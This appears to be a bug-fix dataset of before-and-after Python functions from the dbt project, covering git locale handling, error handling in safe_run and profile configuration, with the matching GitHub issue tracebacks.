after_merge
stringlengths 28
79.6k
| before_merge
stringlengths 20
79.6k
| url
stringlengths 38
71
| full_traceback
stringlengths 43
922k
| traceback_type
stringclasses 555
values |
|---|---|---|---|---|
def show_table(self, result):
table = result.node.agate_table
rand_table = table.order_by(lambda x: random.random())
schema = result.node.schema
alias = result.node.alias
header = "Random sample of table: {}.{}".format(schema, alias)
logger.info("")
logger.info(header)
logger.info("-" * len(header))
rand_table.print_table(max_rows=10, max_columns=None)
logger.info("")
|
def show_table(self, result):
table = result.node["agate_table"]
rand_table = table.order_by(lambda x: random.random())
schema = result.node["schema"]
alias = result.node["alias"]
header = "Random sample of table: {}.{}".format(schema, alias)
logger.info("")
logger.info(header)
logger.info("-" * len(header))
rand_table.print_table(max_rows=10, max_columns=None)
logger.info("")
|
https://github.com/fishtown-analytics/dbt/issues/1288
|
2019-02-12 10:58:28,566 (MainThread): Sending event: {'category': 'dbt', 'action': 'invocation', 'label': 'end', 'context': [<snowplow_tracker.self_describing_json.SelfDescribingJson object at 0x10bcc7e48>, <snowplow_tracker.self_describing_json.SelfDescribingJson object at 0x108697518>, <snowplow_tracker.self_describing_json.SelfDescribingJson object at 0x10bca7358>]}
2019-02-12 10:58:29,028 (MainThread): Flushing usage events
2019-02-12 10:58:29,028 (MainThread): Encountered an error:
2019-02-12 10:58:29,029 (MainThread): 'agate_table'
2019-02-12 10:58:29,029 (MainThread): Traceback (most recent call last):
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/main.py", line 77, in main
results, succeeded = handle_and_check(args)
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/main.py", line 151, in handle_and_check
task, res = run_from_args(parsed)
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/main.py", line 207, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/main.py", line 215, in run_from_task
result = task.run()
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/task/seed.py", line 20, in run
self.show_tables(results)
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/task/seed.py", line 42, in show_tables
self.show_table(result)
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/task/seed.py", line 26, in show_table
table = result.node['agate_table']
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/api/object.py", line 93, in __getitem__
return self._contents[key]
KeyError: 'agate_table'
|
KeyError
|
def clone(repo, cwd, dirname=None, remove_git_dir=False):
clone_cmd = ["git", "clone", "--depth", "1", repo]
if dirname is not None:
clone_cmd.append(dirname)
result = run_cmd(cwd, clone_cmd, env={"LC_ALL": "C"})
if remove_git_dir:
rmdir(os.path.join(dirname, ".git"))
return result
|
def clone(repo, cwd, dirname=None, remove_git_dir=False):
clone_cmd = ["git", "clone", "--depth", "1", repo]
if dirname is not None:
clone_cmd.append(dirname)
result = run_cmd(cwd, clone_cmd)
if remove_git_dir:
rmdir(os.path.join(dirname, ".git"))
return result
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
def list_tags(cwd):
out, err = run_cmd(cwd, ["git", "tag", "--list"], env={"LC_ALL": "C"})
tags = out.decode("utf-8").strip().split("\n")
return tags
|
def list_tags(cwd):
out, err = run_cmd(cwd, ["git", "tag", "--list"])
tags = out.decode("utf-8").strip().split("\n")
return tags
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
def _checkout(cwd, repo, branch):
logger.debug(" Checking out branch {}.".format(branch))
run_cmd(cwd, ["git", "remote", "set-branches", "origin", branch])
run_cmd(cwd, ["git", "fetch", "--tags", "--depth", "1", "origin", branch])
tags = list_tags(cwd)
# Prefer tags to branches if one exists
if branch in tags:
spec = "tags/{}".format(branch)
else:
spec = "origin/{}".format(branch)
out, err = run_cmd(cwd, ["git", "reset", "--hard", spec], env={"LC_ALL": "C"})
return out, err
|
def _checkout(cwd, repo, branch):
logger.debug(" Checking out branch {}.".format(branch))
run_cmd(cwd, ["git", "remote", "set-branches", "origin", branch])
run_cmd(cwd, ["git", "fetch", "--tags", "--depth", "1", "origin", branch])
tags = list_tags(cwd)
# Prefer tags to branches if one exists
if branch in tags:
spec = "tags/{}".format(branch)
else:
spec = "origin/{}".format(branch)
out, err = run_cmd(cwd, ["git", "reset", "--hard", spec])
return out, err
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
def get_current_sha(cwd):
out, err = run_cmd(cwd, ["git", "rev-parse", "HEAD"], env={"LC_ALL": "C"})
return out.decode("utf-8")
|
def get_current_sha(cwd):
out, err = run_cmd(cwd, ["git", "rev-parse", "HEAD"])
return out.decode("utf-8")
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
def remove_remote(cwd):
return run_cmd(cwd, ["git", "remote", "rm", "origin"], env={"LC_ALL": "C"})
|
def remove_remote(cwd):
return run_cmd(cwd, ["git", "remote", "rm", "origin"])
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
def run_cmd(cwd, cmd, env=None):
logger.debug('Executing "{}"'.format(" ".join(cmd)))
if len(cmd) == 0:
raise dbt.exceptions.CommandError(cwd, cmd)
# the env argument replaces the environment entirely, which has exciting
# consequences on Windows! Do an update instead.
full_env = env
if env is not None:
full_env = os.environ.copy()
full_env.update(env)
try:
proc = subprocess.Popen(
cmd, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=full_env
)
out, err = proc.communicate()
except OSError as exc:
_interpret_oserror(exc, cwd, cmd)
logger.debug('STDOUT: "{}"'.format(out))
logger.debug('STDERR: "{}"'.format(err))
if proc.returncode != 0:
logger.debug("command return code={}".format(proc.returncode))
raise dbt.exceptions.CommandResultError(cwd, cmd, proc.returncode, out, err)
return out, err
|
def run_cmd(cwd, cmd):
logger.debug('Executing "{}"'.format(" ".join(cmd)))
if len(cmd) == 0:
raise dbt.exceptions.CommandError(cwd, cmd)
try:
proc = subprocess.Popen(
cmd, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
out, err = proc.communicate()
except OSError as exc:
_interpret_oserror(exc, cwd, cmd)
logger.debug('STDOUT: "{}"'.format(out))
logger.debug('STDERR: "{}"'.format(err))
if proc.returncode != 0:
logger.debug("command return code={}".format(proc.returncode))
raise dbt.exceptions.CommandResultError(cwd, cmd, proc.returncode, out, err)
return out, err
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
def safe_run(self, manifest):
catchable_errors = (
dbt.exceptions.CompilationException,
dbt.exceptions.RuntimeException,
)
result = RunModelResult(self.node)
started = time.time()
try:
# if we fail here, we still have a compiled node to return
# this has the benefit of showing a build path for the errant model
compiled_node = self.compile(manifest)
result.node = compiled_node
# for ephemeral nodes, we only want to compile, not run
if not self.is_ephemeral_model(self.node):
result = self.run(compiled_node, manifest)
except catchable_errors as e:
if e.node is None:
e.node = result.node
result.error = dbt.compat.to_string(e)
result.status = "ERROR"
except dbt.exceptions.InternalException as e:
build_path = self.node.build_path
prefix = "Internal error executing {}".format(build_path)
error = "{prefix}\n{error}\n\n{note}".format(
prefix=dbt.ui.printer.red(prefix),
error=str(e).strip(),
note=INTERNAL_ERROR_STRING,
)
logger.debug(error)
result.error = dbt.compat.to_string(e)
result.status = "ERROR"
except Exception as e:
prefix = "Unhandled error while executing {filepath}".format(
filepath=self.node.build_path
)
error = "{prefix}\n{error}".format(
prefix=dbt.ui.printer.red(prefix), error=str(e).strip()
)
logger.error(error)
result.error = dbt.compat.to_string(e)
result.status = "ERROR"
finally:
exc_str = self._safe_release_connection()
# if releasing failed and the result doesn't have an error yet, set
# an error
if exc_str is not None and result.error is None:
result.error = exc_str
result.status = "ERROR"
result.execution_time = time.time() - started
return result
|
def safe_run(self, manifest):
catchable_errors = (
dbt.exceptions.CompilationException,
dbt.exceptions.RuntimeException,
)
result = RunModelResult(self.node)
started = time.time()
exc_info = (None, None, None)
try:
# if we fail here, we still have a compiled node to return
# this has the benefit of showing a build path for the errant model
compiled_node = self.compile(manifest)
result.node = compiled_node
# for ephemeral nodes, we only want to compile, not run
if not self.is_ephemeral_model(self.node):
result = self.run(compiled_node, manifest)
except catchable_errors as e:
if e.node is None:
e.node = result.node
result.error = dbt.compat.to_string(e)
result.status = "ERROR"
except dbt.exceptions.InternalException as e:
build_path = self.node.build_path
prefix = "Internal error executing {}".format(build_path)
error = "{prefix}\n{error}\n\n{note}".format(
prefix=dbt.ui.printer.red(prefix),
error=str(e).strip(),
note=INTERNAL_ERROR_STRING,
)
logger.debug(error)
result.error = dbt.compat.to_string(e)
result.status = "ERROR"
except Exception as e:
# set this here instead of finally, as python 2/3 exc_info()
# behavior with re-raised exceptions are slightly different
exc_info = sys.exc_info()
prefix = "Unhandled error while executing {filepath}".format(
filepath=self.node.build_path
)
error = "{prefix}\n{error}".format(
prefix=dbt.ui.printer.red(prefix), error=str(e).strip()
)
logger.error(error)
raise e
finally:
exc_str = self._safe_release_connection()
# if we had an unhandled exception, re-raise it
if exc_info and exc_info[1]:
six.reraise(*exc_info)
# if releasing failed and the result doesn't have an error yet, set
# an error
if exc_str is not None and result.error is None:
result.error = exc_str
result.status = "ERROR"
result.execution_time = time.time() - started
return result
|
https://github.com/fishtown-analytics/dbt/issues/1223
|
$ cat macros/oops_materialization.sql
{% materialization oops, default -%}
{{ exceptions.raise_dependency_error('x') }}
{%- endmaterialization %}
$ cat models/base.sql
{{ config(materialized='oops') }}
select 1 as id
$ cat models/dependent.sql
select * from {{ ref('base') }}
$ cat dbt_project.yml
name: 'debug'
version: '0.1.0'
profile: 'debug'
$ dbt run
Found 2 models, 0 tests, 0 archives, 0 analyses, 96 macros, 2 operations, 0 seed files
14:33:08 | Concurrency: 2 threads (target='default')
14:33:08 |
14:33:08 | 1 of 2 START oops model dbt_postgres.base............................ [RUN]
Exception in thread Thread-1:
Traceback (most recent call last):
File "/Users/jake/.pyenv/versions/3.6.5/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/Users/jake/.pyenv/versions/3.6.5/lib/python3.6/threading.py", line 864, in run
self._target(*self._args, **self._kwargs)
File "/Users/jake/.pyenv/versions/3.6.5/lib/python3.6/multiprocessing/pool.py", line 119, in worker
result = (True, func(*args, **kwds))
File "/Users/jake/src/fishtown/dbt/dbt/runner.py", line 80, in call_runner
result = runner.safe_run(self.manifest)
File "/Users/jake/src/fishtown/dbt/dbt/node_runners.py", line 90, in safe_run
result = self.run(compiled_node, manifest)
File "/Users/jake/src/fishtown/dbt/dbt/node_runners.py", line 159, in run
return self.execute(compiled_node, manifest)
File "/Users/jake/src/fishtown/dbt/dbt/node_runners.py", line 456, in execute
materialization_macro.generator(context)()
File "/Users/jake/src/fishtown/dbt/dbt/clients/jinja.py", line 102, in call
return macro(*args, **kwargs)
File "/Users/jake/.pyenv/versions/3.6.5/envs/dbt36old/lib/python3.6/site-packages/jinja2/runtime.py", line 575, in __call__
return self._invoke(arguments, autoescape)
File "/Users/jake/.pyenv/versions/3.6.5/envs/dbt36old/lib/python3.6/site-packages/jinja2/asyncsupport.py", line 110, in _invoke
return original_invoke(self, arguments, autoescape)
File "/Users/jake/.pyenv/versions/3.6.5/envs/dbt36old/lib/python3.6/site-packages/jinja2/runtime.py", line 579, in _invoke
rv = self._func(*arguments)
File "dbt-a42f706d92e89d13921e04ab", line 16, in macro
to_string(environment.call(context, environment.getattr((undefined(name='exceptions') if l_1_exceptions is missing else l_1_exceptions), 'raise_dependency_error'), 'x')),
File "/Users/jake/.pyenv/versions/3.6.5/envs/dbt36old/lib/python3.6/site-packages/jinja2/sandbox.py", line 427, in call
return __context.call(__obj, *args, **kwargs)
File "/Users/jake/.pyenv/versions/3.6.5/envs/dbt36old/lib/python3.6/site-packages/jinja2/runtime.py", line 262, in call
return __obj(*args, **kwargs)
File "/Users/jake/src/fishtown/dbt/dbt/exceptions.py", line 218, in raise_dependency_error
raise DependencyException(msg)
dbt.exceptions.DependencyException: x
^C
Exited because of keyboard interrupt.
Done. PASS=0 ERROR=0 SKIP=0 TOTAL=0
ctrl-c
|
dbt.exceptions.DependencyException
|
def __init__(self, profile_name, target_name, config, threads, credentials):
self.profile_name = profile_name
self.target_name = target_name
if isinstance(config, dict):
config = UserConfig.from_dict(config)
self.config = config
self.threads = threads
self.credentials = credentials
|
def __init__(
self,
profile_name,
target_name,
send_anonymous_usage_stats,
use_colors,
threads,
credentials,
):
self.profile_name = profile_name
self.target_name = target_name
self.send_anonymous_usage_stats = send_anonymous_usage_stats
self.use_colors = use_colors
self.threads = threads
self.credentials = credentials
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def to_profile_info(self, serialize_credentials=False):
"""Unlike to_project_config, this dict is not a mirror of any existing
on-disk data structure. It's used when creating a new profile from an
existing one.
:param serialize_credentials bool: If True, serialize the credentials.
Otherwise, the Credentials object will be copied.
:returns dict: The serialized profile.
"""
result = {
"profile_name": self.profile_name,
"target_name": self.target_name,
"config": self.config.to_dict(),
"threads": self.threads,
"credentials": self.credentials.incorporate(),
}
if serialize_credentials:
result["credentials"] = result["credentials"].serialize()
return result
|
def to_profile_info(self, serialize_credentials=False):
"""Unlike to_project_config, this dict is not a mirror of any existing
on-disk data structure. It's used when creating a new profile from an
existing one.
:param serialize_credentials bool: If True, serialize the credentials.
Otherwise, the Credentials object will be copied.
:returns dict: The serialized profile.
"""
result = {
"profile_name": self.profile_name,
"target_name": self.target_name,
"send_anonymous_usage_stats": self.send_anonymous_usage_stats,
"use_colors": self.use_colors,
"threads": self.threads,
"credentials": self.credentials.incorporate(),
}
if serialize_credentials:
result["credentials"] = result["credentials"].serialize()
return result
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def from_credentials(
cls, credentials, threads, profile_name, target_name, user_cfg=None
):
"""Create a profile from an existing set of Credentials and the
remaining information.
:param credentials Credentials: The credentials for this profile.
:param threads int: The number of threads to use for connections.
:param profile_name str: The profile name used for this profile.
:param target_name str: The target name used for this profile.
:param user_cfg Optional[dict]: The user-level config block from the
raw profiles, if specified.
:raises DbtProfileError: If the profile is invalid.
:returns Profile: The new Profile object.
"""
config = UserConfig.from_dict(user_cfg)
profile = cls(
profile_name=profile_name,
target_name=target_name,
config=config,
threads=threads,
credentials=credentials,
)
profile.validate()
return profile
|
def from_credentials(
cls, credentials, threads, profile_name, target_name, user_cfg=None
):
"""Create a profile from an existing set of Credentials and the
remaining information.
:param credentials Credentials: The credentials for this profile.
:param threads int: The number of threads to use for connections.
:param profile_name str: The profile name used for this profile.
:param target_name str: The target name used for this profile.
:param user_cfg Optional[dict]: The user-level config block from the
raw profiles, if specified.
:raises DbtProfileError: If the profile is invalid.
:returns Profile: The new Profile object.
"""
if user_cfg is None:
user_cfg = {}
send_anonymous_usage_stats = user_cfg.get(
"send_anonymous_usage_stats", DEFAULT_SEND_ANONYMOUS_USAGE_STATS
)
use_colors = user_cfg.get("use_colors", DEFAULT_USE_COLORS)
profile = cls(
profile_name=profile_name,
target_name=target_name,
send_anonymous_usage_stats=send_anonymous_usage_stats,
use_colors=use_colors,
threads=threads,
credentials=credentials,
)
profile.validate()
return profile
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def from_args(cls, args, project_profile_name=None, cli_vars=None):
"""Given the raw profiles as read from disk and the name of the desired
profile if specified, return the profile component of the runtime
config.
:param args argparse.Namespace: The arguments as parsed from the cli.
:param cli_vars dict: The command-line variables passed as arguments,
as a dict.
:param project_profile_name Optional[str]: The profile name, if
specified in a project.
:raises DbtProjectError: If there is no profile name specified in the
project or the command line arguments, or if the specified profile
is not found
:raises DbtProfileError: If the profile is invalid or missing, or the
target could not be found.
:returns Profile: The new Profile object.
"""
if cli_vars is None:
cli_vars = dbt.utils.parse_cli_vars(getattr(args, "vars", "{}"))
threads_override = getattr(args, "threads", None)
target_override = getattr(args, "target", None)
raw_profiles = read_profile(args.profiles_dir)
profile_name = cls.pick_profile_name(args.profile, project_profile_name)
return cls.from_raw_profiles(
raw_profiles=raw_profiles,
profile_name=profile_name,
cli_vars=cli_vars,
target_override=target_override,
threads_override=threads_override,
)
|
def from_args(cls, args, project_profile_name=None, cli_vars=None):
"""Given the raw profiles as read from disk and the name of the desired
profile if specified, return the profile component of the runtime
config.
:param args argparse.Namespace: The arguments as parsed from the cli.
:param cli_vars dict: The command-line variables passed as arguments,
as a dict.
:param project_profile_name Optional[str]: The profile name, if
specified in a project.
:raises DbtProjectError: If there is no profile name specified in the
project or the command line arguments, or if the specified profile
is not found
:raises DbtProfileError: If the profile is invalid or missing, or the
target could not be found.
:returns Profile: The new Profile object.
"""
if cli_vars is None:
cli_vars = dbt.utils.parse_cli_vars(getattr(args, "vars", "{}"))
threads_override = getattr(args, "threads", None)
# TODO(jeb): is it even possible for this to not be set?
profiles_dir = getattr(args, "profiles_dir", PROFILES_DIR)
target_override = getattr(args, "target", None)
raw_profiles = read_profile(profiles_dir)
profile_name = cls.pick_profile_name(args.profile, project_profile_name)
return cls.from_raw_profiles(
raw_profiles=raw_profiles,
profile_name=profile_name,
cli_vars=cli_vars,
target_override=target_override,
threads_override=threads_override,
)
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
